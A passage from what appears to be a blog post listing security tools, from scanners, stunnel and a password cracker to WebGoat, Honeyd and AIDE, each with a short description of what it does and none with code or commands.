device or network. Some of its features include asynchronous stateless TCP
scanning with all variations of TCP flags, asynchronous stateless TCP banner
grabbing, and active/passive remote OS, application, and component
identification by analyzing responses. Like Scanrand, it isn't for the faint of
heart.
The
stunnel program is designed to work as an SSL encryption wrapper between remote
client and local (inetd-startable) or remote servers. It can be used to add SSL
functionality to commonly used inetd daemons like POP2, POP3, and IMAP servers
without any changes in the programs' code. It will negotiate an SSL connection
using the OpenSSL or SSLeay libraries.
Security
Enhanced Linux (SELinux) is a security enhancement to Linux implementing
mandatory access control (MAC). Users and processes can be granted their least
required privileges in a much more granular way than with traditional Unix
access control. For example, you can define a policy to prevent your web
browser from reading your SSH keys.
This
Windows-only cracker bangs against network services of remote systems trying to
guess passwords by using a dictionary and permutations thereof. It supports
HTTP, POP3, FTP, SMB, TELNET, IMAP, NNTP, and more. No source code is
available. UNIX users should take a look at THC Hydra.
EnCase
is a suite of computer forensics software, commonly used by law enforcement.
Its wide use has made it a de-facto standard in forensics. It is made to
collect data from a computer in a forensically sound manner (employing
checksums to help detect tampering
Wapiti
allows you to audit the security of your web applications. It performs "black-box"
scans; i.e., it does not study the source code of the application but will
scans the webpages of the deployed webapp, looking for scripts and forms where
it can inject data. Once it gets this list, Wapiti acts like a fuzzer,
injecting payloads to see if a script is vulnerable.
WebGoat
is a deliberately insecure J2EE web application maintained by OWASP designed
to teach web application security lessons. In each lesson, users must
demonstrate their understanding of a security issue by exploiting a real
vulnerability in the WebGoat application. For example, in one of the lessons
the user must use SQL injection to steal fake credit card numbers. The application
is a realistic teaching environment, providing users with hints and code to
further explain the lesson.
HijackThis
inspects a computer’s browser and operating system settings to generate a log
file of its current state. It can selectively remove unwanted settings and
files. Its main focus is on web browser hijacking. It is a freeware utility
originally written by Merijn Bellekom but now distributed by Trend Micro
Honeyd
is a small daemon that creates virtual hosts on a network. The hosts can be
configured to run arbitrary services, and their TCP personality can be adapted
so that they appear to be running certain versions of operating systems. Honeyd
enables a single host to claim multiple addresses on a LAN for network
simulation. It is possible to ping the virtual machines, or to traceroute them.
AIDE
(Advanced Intrusion Detection Environment) is a rootkit detector, a free
replacement for Tripwire. It makes cryptographic hashes of important system files
and stores them in a database. It can then make reports about which files have
changed.
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.